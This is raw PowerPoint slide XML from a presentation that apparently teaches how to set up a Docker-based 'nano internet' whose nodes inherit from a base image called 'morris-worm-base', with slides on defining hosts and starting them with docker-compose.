          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>morris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-worm-base</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25AB8517-0564-912C-57D7-0DA8C389ECC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4195011" y="2638926"/>
            <a:ext cx="264694" cy="2488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664FDD82-8354-6659-6075-BB767040D2B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9379884" y="2179875"/>
            <a:ext cx="1048800" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF777FA-E1D8-E035-7718-D1F0CC106070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402056" y="1519473"/>
            <a:ext cx="5179367" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define a host/node of nano internet using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10009E38-E798-65DC-6D0B-ECF9B27777D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596209" y="918943"/>
            <a:ext cx="804591" cy="948892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23262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5B6A3-BD38-2FB8-EB05-2854ECE233D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440659" y="2054820"/>
            <a:ext cx="8245555" cy="2507197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B698284D-DE0A-F29C-36A2-6A184C999A15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8398322" y="3188517"/>
            <a:ext cx="1287892" cy="975445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E76D8F-66FA-C790-61EE-CC76320DF5A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5174901" y="2823586"/>
            <a:ext cx="3052042" cy="90089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14E50D71-9073-5776-1214-7045950D3720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6739433" y="2926907"/>
            <a:ext cx="1048800" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DCC8306-9FDE-1F9C-CDB6-B234FD52CFFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440659" y="1685488"/>
            <a:ext cx="8985537" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The host/node of nano internet is inherited from another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>morris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-worm-base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144559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C2BF493-F611-A5FC-CBAD-AE20C463C0E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start nano internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE3638A4-D553-B04A-CAAB-80732E04077F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7072923" y="102979"/>
            <a:ext cx="4030759" cy="1964661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4334B01-5B31-F557-EA67-5E6146E98A47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7072923" y="4210"/>
            <a:ext cx="5119077" cy="197539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258DE9AE-43B0-8C3A-6E9E-7C80620A188C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914918" y="2383502"/>
            <a:ext cx="6081287" cy="1478408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB10372-97A2-B79D-ACD1-2495AA5C002C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="5263" b="69884"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914918" y="3861910"/>
            <a:ext cx="7628281" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A4E9DF-73B6-33F2-5D5D-94CCA6464176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914918" y="1952834"/>
            <a:ext cx="4762779" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build images with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>docker-compose up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6124978-F721-6319-21C9-B32A3D72F86C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914918" y="4416401"/>
            <a:ext cx="8307211" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nono</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> internet by firing up containers using the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>docker-compose up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325B142D-03DF-143E-7881-E08ED651471C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="29821"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914918" y="4801213"/>
            <a:ext cx="7628281" cy="1042875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369865C3-C5B8-6FE0-67EC-65C8FE79AFC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2652821" y="1924358"/>
            <a:ext cx="3579840" cy="826920"/>
            <a:chOff x="2652821" y="1924358"/>
            <a:chExt cx="3579840" cy="82692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B3BC0E1-1A63-AF5C-1DA4-9D7A43A136A4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4108301" y="2282198"/>
                <a:ext cx="2124360" cy="469080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB3BC0E1-1A63-AF5C-1DA4-9D7A43A136A4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4099301" y="2273558"/>
                  <a:ext cx="2142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606C8036-D9F9-EBD9-E26E-43F8232127AB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4210901" y="2285438"/>
                <a:ext cx="135720" cy="16920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="18" name="Ink 17">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{606C8036-D9F9-EBD9-E26E-43F8232127AB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId10"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4201901" y="2276438"/>
                  <a:ext cx="153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6AAB30A2-AB8C-C899-22B0-8317E632B5BD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2652821" y="1924358"/>
                <a:ext cx="1897920" cy="402120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="20" name="Ink 19">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AAB30A2-AB8C-C899-22B0-8317E632B5BD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId12"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2644181" y="1915718"/>
                  <a:ext cx="1915560" cy="41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3B562B81-2400-E128-6E0D-92FDEBB75D5C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7224821" y="4346438"/>
              <a:ext cx="1912320" cy="410400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Ink 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B562B81-2400-E128-6E0D-92FDEBB75D5C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId14"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7216181" y="4337798"/>
                <a:ext cx="1929960" cy="428040"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCDEEEC6-E543-EBA5-10A8-42AE04E9DD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6640901" y="4772318"/>
            <a:ext cx="1239480" cy="162360"/>
            <a:chOff x="6640901" y="4772318"/>
            <a:chExt cx="1239480" cy="162360"/>
          </a:xfrm>
        </p:grpSpPr>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BFE2CFBF-3392-DC22-CE7F-F5148F53862D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6640901" y="4779158"/>
                <a:ext cx="1159200" cy="155520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="23" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFE2CFBF-3392-DC22-CE7F-F5148F53862D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId16"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6632261" y="4770518"/>
                  <a:ext cx="1176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447A3597-07DC-C994-FCE0-30EB37D75AC3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7796141" y="4772318"/>
                <a:ext cx="84240" cy="74520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="24" name="Ink 23">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{447A3597-07DC-C994-FCE0-30EB37D75AC3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId18"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7787141" y="4763318"/>
                  <a:ext cx="101880" cy="92160"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2109843-5707-3C09-B093-3B8CFA25B423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931937" y="2170324"/>
            <a:ext cx="601447" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>alias</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FAF9160-342D-C1DD-E7F6-666C0452964B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7194694" y="5004829"/>
            <a:ext cx="601447" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>alias</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62179423-740D-BE40-246F-CD8795EE007B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
